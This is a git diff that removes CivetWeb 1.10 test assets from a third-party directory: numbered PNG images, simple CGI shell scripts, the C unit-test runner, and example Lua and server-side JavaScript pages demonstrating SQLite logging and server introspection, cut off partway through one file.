diff --git a/thirdparty/civetweb-1.10/test/imagetest/44.png b/thirdparty/civetweb-1.10/test/imagetest/44.png
deleted file mode 100644
index 5745c68..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/44.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/45.png b/thirdparty/civetweb-1.10/test/imagetest/45.png
deleted file mode 100644
index e8411b7..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/45.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/46.png b/thirdparty/civetweb-1.10/test/imagetest/46.png
deleted file mode 100644
index 532d175..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/46.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/47.png b/thirdparty/civetweb-1.10/test/imagetest/47.png
deleted file mode 100644
index ca30f6f..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/47.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/48.png b/thirdparty/civetweb-1.10/test/imagetest/48.png
deleted file mode 100644
index 0c20c82..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/48.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/49.png b/thirdparty/civetweb-1.10/test/imagetest/49.png
deleted file mode 100644
index a4e6799..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/49.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/50.png b/thirdparty/civetweb-1.10/test/imagetest/50.png
deleted file mode 100644
index e78c9f1..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/50.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/51.png b/thirdparty/civetweb-1.10/test/imagetest/51.png
deleted file mode 100644
index dd0aeb7..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/51.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/52.png b/thirdparty/civetweb-1.10/test/imagetest/52.png
deleted file mode 100644
index 7672eef..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/52.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/53.png b/thirdparty/civetweb-1.10/test/imagetest/53.png
deleted file mode 100644
index 5537179..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/53.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/54.png b/thirdparty/civetweb-1.10/test/imagetest/54.png
deleted file mode 100644
index d8fb264..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/54.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/55.png b/thirdparty/civetweb-1.10/test/imagetest/55.png
deleted file mode 100644
index cfa47a8..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/55.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/56.png b/thirdparty/civetweb-1.10/test/imagetest/56.png
deleted file mode 100644
index 51d7bc7..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/56.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/57.png b/thirdparty/civetweb-1.10/test/imagetest/57.png
deleted file mode 100644
index 645b8ec..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/57.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/58.png b/thirdparty/civetweb-1.10/test/imagetest/58.png
deleted file mode 100644
index eb861f5..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/58.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/59.png b/thirdparty/civetweb-1.10/test/imagetest/59.png
deleted file mode 100644
index d9041b5..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/59.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/60.png b/thirdparty/civetweb-1.10/test/imagetest/60.png
deleted file mode 100644
index 8071819..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/60.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/61.png b/thirdparty/civetweb-1.10/test/imagetest/61.png
deleted file mode 100644
index e539e1b..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/61.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/62.png b/thirdparty/civetweb-1.10/test/imagetest/62.png
deleted file mode 100644
index 7d20d26..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/62.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/63.png b/thirdparty/civetweb-1.10/test/imagetest/63.png
deleted file mode 100644
index 66c7391..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/63.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/64.png b/thirdparty/civetweb-1.10/test/imagetest/64.png
deleted file mode 100644
index 34c4dff..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/64.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/65.png b/thirdparty/civetweb-1.10/test/imagetest/65.png
deleted file mode 100644
index 9dbbb66..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/65.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/66.png b/thirdparty/civetweb-1.10/test/imagetest/66.png
deleted file mode 100644
index 2ced8c3..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/66.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/67.png b/thirdparty/civetweb-1.10/test/imagetest/67.png
deleted file mode 100644
index 225a716..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/67.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/68.png b/thirdparty/civetweb-1.10/test/imagetest/68.png
deleted file mode 100644
index 2a10e83..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/68.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/69.png b/thirdparty/civetweb-1.10/test/imagetest/69.png
deleted file mode 100644
index 37288a0..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/69.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/70.png b/thirdparty/civetweb-1.10/test/imagetest/70.png
deleted file mode 100644
index e39da97..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/70.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/71.png b/thirdparty/civetweb-1.10/test/imagetest/71.png
deleted file mode 100644
index 4ea682c..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/71.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/72.png b/thirdparty/civetweb-1.10/test/imagetest/72.png
deleted file mode 100644
index ff60546..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/72.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/73.png b/thirdparty/civetweb-1.10/test/imagetest/73.png
deleted file mode 100644
index c97a356..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/73.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/74.png b/thirdparty/civetweb-1.10/test/imagetest/74.png
deleted file mode 100644
index 9786789..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/74.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/75.png b/thirdparty/civetweb-1.10/test/imagetest/75.png
deleted file mode 100644
index c66094e..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/75.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/76.png b/thirdparty/civetweb-1.10/test/imagetest/76.png
deleted file mode 100644
index 2cf1fc9..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/76.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/77.png b/thirdparty/civetweb-1.10/test/imagetest/77.png
deleted file mode 100644
index 80dd704..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/77.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/78.png b/thirdparty/civetweb-1.10/test/imagetest/78.png
deleted file mode 100644
index 110277d..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/78.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/79.png b/thirdparty/civetweb-1.10/test/imagetest/79.png
deleted file mode 100644
index 145d580..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/79.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/80.png b/thirdparty/civetweb-1.10/test/imagetest/80.png
deleted file mode 100644
index 414c12a..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/80.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/81.png b/thirdparty/civetweb-1.10/test/imagetest/81.png
deleted file mode 100644
index acdc06f..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/81.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/82.png b/thirdparty/civetweb-1.10/test/imagetest/82.png
deleted file mode 100644
index 0fa4b88..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/82.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/83.png b/thirdparty/civetweb-1.10/test/imagetest/83.png
deleted file mode 100644
index 26bcb19..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/83.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/84.png b/thirdparty/civetweb-1.10/test/imagetest/84.png
deleted file mode 100644
index 9b883da..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/84.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/85.png b/thirdparty/civetweb-1.10/test/imagetest/85.png
deleted file mode 100644
index 481069e..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/85.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/86.png b/thirdparty/civetweb-1.10/test/imagetest/86.png
deleted file mode 100644
index b1c4c44..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/86.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/87.png b/thirdparty/civetweb-1.10/test/imagetest/87.png
deleted file mode 100644
index 266b2eb..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/87.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/88.png b/thirdparty/civetweb-1.10/test/imagetest/88.png
deleted file mode 100644
index cbcdd26..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/88.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/89.png b/thirdparty/civetweb-1.10/test/imagetest/89.png
deleted file mode 100644
index 90dc196..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/89.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/90.png b/thirdparty/civetweb-1.10/test/imagetest/90.png
deleted file mode 100644
index f7c7994..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/90.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/91.png b/thirdparty/civetweb-1.10/test/imagetest/91.png
deleted file mode 100644
index 756c548..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/91.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/92.png b/thirdparty/civetweb-1.10/test/imagetest/92.png
deleted file mode 100644
index 4c5abd7..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/92.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/93.png b/thirdparty/civetweb-1.10/test/imagetest/93.png
deleted file mode 100644
index f6e0660..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/93.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/94.png b/thirdparty/civetweb-1.10/test/imagetest/94.png
deleted file mode 100644
index c5b1ca1..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/94.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/95.png b/thirdparty/civetweb-1.10/test/imagetest/95.png
deleted file mode 100644
index 1a7c3dd..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/95.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/96.png b/thirdparty/civetweb-1.10/test/imagetest/96.png
deleted file mode 100644
index 36b01c3..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/96.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/97.png b/thirdparty/civetweb-1.10/test/imagetest/97.png
deleted file mode 100644
index 75ca62c..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/97.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/98.png b/thirdparty/civetweb-1.10/test/imagetest/98.png
deleted file mode 100644
index 22094b8..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/98.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/99.png b/thirdparty/civetweb-1.10/test/imagetest/99.png
deleted file mode 100644
index 9a97ff5..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/99.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/linux.cgi b/thirdparty/civetweb-1.10/test/linux.cgi
deleted file mode 100755
index f65fc7a..0000000
--- a/thirdparty/civetweb-1.10/test/linux.cgi
+++ /dev/null
@@ -1,9 +0,0 @@
-#!/bin/sh
-
-printf "Content-Type: text/plain\r\n"
-printf "\r\n"
-
-echo "This is a shell script called by CGI:"
-echo
-set
-
diff --git a/thirdparty/civetweb-1.10/test/linux_fail.cgi b/thirdparty/civetweb-1.10/test/linux_fail.cgi
deleted file mode 100644
index 885dff2..0000000
--- a/thirdparty/civetweb-1.10/test/linux_fail.cgi
+++ /dev/null
@@ -1,4 +0,0 @@
-#!/bin/sh
-
->&2 echo "Some error sent to stderr"
-
diff --git a/thirdparty/civetweb-1.10/test/linux_fail_silent.cgi b/thirdparty/civetweb-1.10/test/linux_fail_silent.cgi
deleted file mode 100644
index 0cc08c7..0000000
--- a/thirdparty/civetweb-1.10/test/linux_fail_silent.cgi
+++ /dev/null
@@ -1,5 +0,0 @@
-#!/bin/sh
-
-echo not a complete header
-echo and nothing sent to stderr
-
diff --git a/thirdparty/civetweb-1.10/test/lua_preload_file.lua b/thirdparty/civetweb-1.10/test/lua_preload_file.lua
deleted file mode 100644
index 7761f47..0000000
--- a/thirdparty/civetweb-1.10/test/lua_preload_file.lua
+++ /dev/null
@@ -1,7 +0,0 @@
---[[

-Load this test file by adding  

-  lua_preload_file ./lua_preload_file.lua

-to the civetweb.conf file

-]]

-

-mg.preload = "lua_preload_file successfully loaded"

diff --git a/thirdparty/civetweb-1.10/test/main.c b/thirdparty/civetweb-1.10/test/main.c
deleted file mode 100644
index b6f8796..0000000
--- a/thirdparty/civetweb-1.10/test/main.c
+++ /dev/null
@@ -1,103 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-
-#include "civetweb_check.h"
-#include "shared.h"
-#include "public_func.h"
-#include "public_server.h"
-#include "private.h"
-#include "timertest.h"
-#include "private_exe.h"
-
-#include <stdlib.h>
-#include <stdio.h>
-#include <string.h>
-
-/* This unit test file uses the excellent Check unit testing library.
- * The API documentation is available here:
- * http://check.sourceforge.net/doc/check_html/index.html
- */
-
-int
-main(const int argc, char *argv[])
-{
-	// Determine what tests to run
-	const char *suite = NULL;
-	const char *const suite_arg = "--suite=";
-	const size_t suite_arg_size = strlen(suite_arg);
-	const char *test_case = NULL;
-	const char *const test_case_arg = "--test-case=";
-	const size_t test_case_arg_size = strlen(test_case_arg);
-	const char *const test_dir_arg = "--test-dir=";
-	const size_t test_dir_arg_size = strlen(test_dir_arg);
-
-	SRunner *srunner;
-	int number_run = 0;
-	int number_failed = 0;
-
-	int i;
-
-	for (i = 1; i < argc; ++i) {
-		if (0 == strncmp(suite_arg, argv[i], suite_arg_size)
-		    && (strlen(argv[i]) > suite_arg_size)) {
-			suite = &argv[i][suite_arg_size];
-		} else if (0 == strncmp(test_case_arg, argv[i], test_case_arg_size)
-		           && (strlen(argv[i]) > test_case_arg_size)) {
-			test_case = &argv[i][test_case_arg_size];
-		} else if (0 == strncmp(test_dir_arg, argv[i], test_dir_arg_size)
-		           && (strlen(argv[i]) > test_dir_arg_size)) {
-			set_test_directory(&argv[i][test_dir_arg_size]);
-		} else if (0 == strcmp("--help", argv[i])) {
-			printf(
-			    "Usage: %s [options]\n"
-			    "  --suite=Suite            Determines the suite to run\n"
-			    "  --test-case='Test Case'  Determines the test case to run\n"
-			    "  --test-dir='folder/path' The location of the test directory "
-			    "with the \n"
-			    "                           'fixtures' and 'expected\n",
-			    argv[0]);
-			exit(EXIT_SUCCESS);
-		} else {
-			fprintf(stderr, "Invalid argument: %s\n", argv[i]);
-			exit(EXIT_FAILURE);
-		}
-	}
-
-	/* Run up the tests */
-	srunner = srunner_create(make_public_func_suite());
-	srunner_add_suite(srunner, make_public_server_suite());
-	srunner_add_suite(srunner, make_private_suite());
-	srunner_add_suite(srunner, make_private_exe_suite());
-	srunner_add_suite(srunner, make_timertest_suite());
-
-	/* Write test logs to a file */
-	srunner_set_log(srunner, "test.log");
-	srunner_set_xml(srunner, "test.xml");
-
-	/* CK_NORMAL offers not enough diagnosis during setup phase*/
-	srunner_run(srunner, suite, test_case, CK_VERBOSE);
-
-	number_run = srunner_ntests_run(srunner);
-	number_failed = srunner_ntests_failed(srunner);
-	srunner_free(srunner);
-	return (number_failed == 0) && (number_run != 0) ? EXIT_SUCCESS
-	                                                 : EXIT_FAILURE;
-}
diff --git a/thirdparty/civetweb-1.10/test/page.lp b/thirdparty/civetweb-1.10/test/page.lp
deleted file mode 100644
index 3e012e2..0000000
--- a/thirdparty/civetweb-1.10/test/page.lp
+++ /dev/null
@@ -1,71 +0,0 @@
-HTTP/1.0 200 OK
-Content-Type: text/html
-
-<html><body>
-
-
-<p>This is another example of a Lua server page, served by
-<a href="https://github.com/civetweb/civetweb/">CivetWeb web server</a>.
-</p><p>
-The following features are available:
-<ul>
-<?
-  mg.write("<li>" .. _VERSION .. " server pages</li>")
-  if sqlite3 then
-    mg.write("<li>sqlite3 binding</li>")
-  end
-  if lfs then
-    mg.write("<li>lua file system</li>")
-  end
-?>
-</ul></p>
-<p> Today is <? mg.write(os.date("%A")) ?></p>
-<p> URI is <? mg.write(mg.request_info.uri) ?></p>
-<p> URI is <?=mg.request_info.uri?></p>
-
-<p>Database example:
-<pre>
-<?
-  -- Open database
-  local db = sqlite3.open('requests.db')
-  -- Note that the data base is located in the current working directory
-  -- of the process if no other path is given here.
-
-  -- Setup a trace callback, to show SQL statements we'll be executing.
-  -- db:trace(function(data, sql) mg.write('Executing: ', sql: '\n') end, nil)
-
-  -- Create a table if it is not created already
-  db:exec([[
-    CREATE TABLE IF NOT EXISTS requests (
-      id INTEGER PRIMARY KEY AUTOINCREMENT,
-      timestamp NOT NULL,
-      method NOT NULL,
-      uri NOT NULL,
-      addr
-    );
-  ]])
-
-  -- Add entry about this request
-  local stmt = db:prepare(
-    'INSERT INTO requests VALUES(NULL, datetime("now"), ?, ?, ?);');
-  stmt:bind_values(mg.request_info.request_method,
-                   mg.request_info.uri,
-                   mg.request_info.remote_port)
-  stmt:step()
-  stmt:finalize()
-
-  -- Show all previous records
-  mg.write('Previous requests:\n')
-  stmt = db:prepare('SELECT * FROM requests ORDER BY id DESC;')
-  while stmt:step() == sqlite3.ROW do
-    local v = stmt:get_values()
-    mg.write(v[1] .. ' ' .. v[2] .. ' ' .. v[3] .. ' '
-          .. v[4] .. ' ' .. v[5] .. '\n')
-  end
-
-  -- Close database
-  db:close()
-?>
-</pre></p>
-
-</body></html>
diff --git a/thirdparty/civetweb-1.10/test/page.lua b/thirdparty/civetweb-1.10/test/page.lua
deleted file mode 100644
index 2b5600a..0000000
--- a/thirdparty/civetweb-1.10/test/page.lua
+++ /dev/null
@@ -1,71 +0,0 @@
-mg.write("HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n")
-
-mg.write([[
-<html><body>
-<p>This is another example of a Lua script, creating a web page served by the
-<a href="https://github.com/civetweb/civetweb/">CivetWeb web server</a>.
-</p><p>
-The following features are available:
-<ul>
-]])
-
-  mg.write("<li>" .. _VERSION .. " server pages</li>")
-  if sqlite3 then
-    mg.write("<li>sqlite3 binding</li>")
-  end
-  if lfs then
-    mg.write("<li>lua file system</li>")
-  end
-
-  
-mg.write("</ul></p>\r\n")
-mg.write("<p> Today is " .. os.date("%A") .. "</p>\r\n")
-mg.write("<p> URI is " .. mg.request_info.uri .. "</p>\r\n")
-
-mg.write("<p>Database example:\r\n<pre>\r\n")
-
-  -- Open database
-  local db = sqlite3.open('requests.db')
-  -- Note that the data base is located in the current working directory
-  -- of the process if no other path is given here.
-
-  -- Setup a trace callback, to show SQL statements we'll be executing.
-  -- db:trace(function(data, sql) mg.write('Executing: ', sql: '\n') end, nil)
-
-  -- Create a table if it is not created already
-  db:exec([[
-    CREATE TABLE IF NOT EXISTS requests (
-      id INTEGER PRIMARY KEY AUTOINCREMENT,
-      timestamp NOT NULL,
-      method NOT NULL,
-      uri NOT NULL,
-      addr
-    );
-  ]])
-
-  -- Add entry about this request
-  local stmt = db:prepare(
-    'INSERT INTO requests VALUES(NULL, datetime("now"), ?, ?, ?);');
-  stmt:bind_values(mg.request_info.request_method,
-                   mg.request_info.uri,
-                   mg.request_info.remote_port)
-  stmt:step()
-  stmt:finalize()
-
-  -- Show all previous records
-  mg.write('Previous requests:\n')
-  stmt = db:prepare('SELECT * FROM requests ORDER BY id DESC;')
-  while stmt:step() == sqlite3.ROW do
-    local v = stmt:get_values()
-    mg.write(v[1] .. ' ' .. v[2] .. ' ' .. v[3] .. ' '
-          .. v[4] .. ' ' .. v[5] .. '\n')
-  end
-
-  -- Close database
-  db:close()
-
-mg.write([[
-</pre>
-</p>
-</body></html>
-]])
diff --git a/thirdparty/civetweb-1.10/test/page.ssjs b/thirdparty/civetweb-1.10/test/page.ssjs
deleted file mode 100644
index d4465a6..0000000
--- a/thirdparty/civetweb-1.10/test/page.ssjs
+++ /dev/null
@@ -1,19 +0,0 @@
-print = conn.write || print

-

-// send a header

-print('HTTP/1.0 200 OK\r\n');

-print('Content-Type: text/html\r\n');

-print('\r\n');

-

-print("<html><body>\n");

-print("<p>This example page is generated by the ");

-print('<a href="https://github.com/civetweb/civetweb">CivetWeb web server</a>');

-print(" with server side javascript.</p>\n");

-

-var d = new Date();

-var n = d.toString(); 

-

-print("<p>Server time: " + n + "</p>\n");

-

-print("</body></html>\n");

-

diff --git a/thirdparty/civetweb-1.10/test/page2.lp b/thirdparty/civetweb-1.10/test/page2.lp
deleted file mode 100644
index c98b940..0000000
--- a/thirdparty/civetweb-1.10/test/page2.lp
+++ /dev/null
@@ -1,72 +0,0 @@
-<? mg.write("HTTP/1.0 200 OK") ?>

-<? mg.write("Content-Type: text/html") ?>

-

-<html><body>

-

-<p>This is another example of a Lua server page, served by

-<a href="https://github.com/civetweb/civetweb">CivetWeb web server</a>.

-</p><p>

-The following features are available:

-<ul>

-<?

-  -- functions defubed in one Lua tag should still be available in the next one

-  function print_if_available(tab, name)

-    if tab then

-      mg.write("<li>" .. name .. "</li>\n")

-    end

-  end

-

-  function recurse(tab)

-    mg.write("<ul>\n")

-    for k,v in pairs(tab) do

-      if type(v) == "table" then

-        mg.write("<li>" .. tostring(k) .. ":</li>\n")

-        recurse(v)

-      else

-        mg.write("<li>" .. tostring(k) .. " = " .. tostring(v) .. "</li>\n")

-      end

-    end

-    mg.write("</ul>\n")

-  end

-?>

-<?

-  -- Print Lua version and available libraries

-  mg.write("<li>" .. _VERSION .. " with the following standard libraries</li>\n")

-  mg.write("<ul>")

-  libs = {"string", "math", "table", "io", "os", "bit32", "utf8", "package", "coroutine", "debug"};

-  for _,n in ipairs(libs) do

-    print_if_available(_G[n], n);

-  end

-  mg.write("</ul>\n")

-  print_if_available(sqlite3, "sqlite3 binding")

-  print_if_available(lfs,"lua file system")

-

-  -- Print mg library

-  libname = "mg"

-  print_if_available(_G[libname], libname .. " library")

-  recurse(_G[libname])

-

-  -- Print connect function

-  print_if_available(connect, "connect function")

-

-?>

-</ul></p>

-<p> Today is <? mg.write(os.date("%A")) ?>

-

-<p>

-<?

-  -- for k,v in pairs(_G) do mg.write(k, '\n') end

-

-  if lfs then

-    mg.write("Files in " .. lfs.currentdir())

-    mg.write("\n<ul>\n")

-    for f in lfs.dir(".") do

-      mg.write("<li>" .. f .. "</li>\n")

-      local at = lfs.attributes(f);

-      recurse(at)

-    end

-    mg.write("</ul>\n")

-  end

-?>

-</p>

-</body></html>

diff --git a/thirdparty/civetweb-1.10/test/page2.lua b/thirdparty/civetweb-1.10/test/page2.lua
deleted file mode 100644
index 9c4a5b7..0000000
--- a/thirdparty/civetweb-1.10/test/page2.lua
+++ /dev/null
@@ -1,91 +0,0 @@
-mg.write("HTTP/1.0 200 OK\r\n")

-mg.write("Content-Type: text/html\r\n")

-mg.write("\r\n")

-mg.write([[<html><body>

-

-<p>This is another example of a Lua server page, served by

-<a href="https://github.com/civetweb/civetweb">CivetWeb web server</a>.

-</p><p>

-The following features are available:

-<ul>

-]])

-

-function print_if_available(tab, name)

-  if tab then

-    mg.write("<li>" .. name .. "</li>\n")

-  end

-end

-

-function recurse(tab, excl)

-  excl = excl or {}

-  mg.write("<ul>\n")

-  for k,v in pairs(tab) do

-    if type(v) == "table" then

-      mg.write("<li>" .. tostring(k) .. ":</li>\n")

-      if excl[v] then

-        -- cyclic

-      else

-        excl[v] = true

-        recurse(v, excl)

-        excl[v] = false

-      end

-    else

-      mg.write("<li>" .. tostring(k) .. " = " .. tostring(v) .. "</li>\n")

-    end

-  end

-  mg.write("</ul>\n")

-end

-

--- Print Lua version and available libraries

-mg.write("<li>" .. _VERSION .. " with the following standard libraries</li>\n")

-mg.write("<ul>\n")

-libs = {"string", "math", "table", "io", "os", "bit32", "utf8", "package", "coroutine", "debug"};

-for _,n in ipairs(libs) do

-  print_if_available(_G[n], n);

-end

-mg.write("</ul>\n")

-print_if_available(sqlite3, "sqlite3 binding")

-print_if_available(lfs, "lua file system")

-

---recurse(_G)

-

--- Print mg library

-libname = "mg"

-print_if_available(_G[libname], libname .. " library")

-recurse(_G[libname])

-

--- Print connect function

-print_if_available(connect, "connect function")

-

--- Get all server options

-mg.write("<li>server options</li>\n")

-recurse(mg.get_option())

-

-mg.write("</ul></p>\n");

-mg.write("<p> Today is " .. os.date("%A") .. "</p>\n");

-

-l = mg.request_info.content_length

-if l then

-  mg.write("<p>Content-Length = "..l..":<br>\n<pre>\n")

-  mg.write(mg.read())

-  mg.write("\n</pre>\n</p>\n")

-end

-

-mg.write("<p>\n");

-

- if lfs then

-  mg.write("Files in " .. lfs.currentdir())

-  mg.write("\n<ul>\n")

-  for f in lfs.dir(".") do

-    local mime = mg.get_mime_type(f)

-    mg.write("<li>" .. f .. " (" .. mime .. ")</li>\n")

-    local at = lfs.attributes(f);

-    recurse(at)

-  end

-  mg.write("</ul>\n")

-end

-

-mg.write([[

-</p>

-</body></html>

-]])

diff --git a/thirdparty/civetweb-1.10/test/page2.ssjs b/thirdparty/civetweb-1.10/test/page2.ssjs
deleted file mode 100644
index 66e0c83..0000000
--- a/thirdparty/civetweb-1.10/test/page2.ssjs
+++ /dev/null
@@ -1,30 +0,0 @@
-conn.write("HTTP/1.0 200 OK\r\n")

-conn.write("Content-Type: text/html\r\n")

-conn.write("\r\n")

-conn.write("<html><body>\r\n")

-conn.write("<p>This is an example of a server side JavaScript, served by the ")

-conn.write('<a href="https://github.com/civetweb/civetweb/">CivetWeb web server</a>.')

-conn.write("</p>\r\n")

-

-

-function print_elements(title, obj)

-{

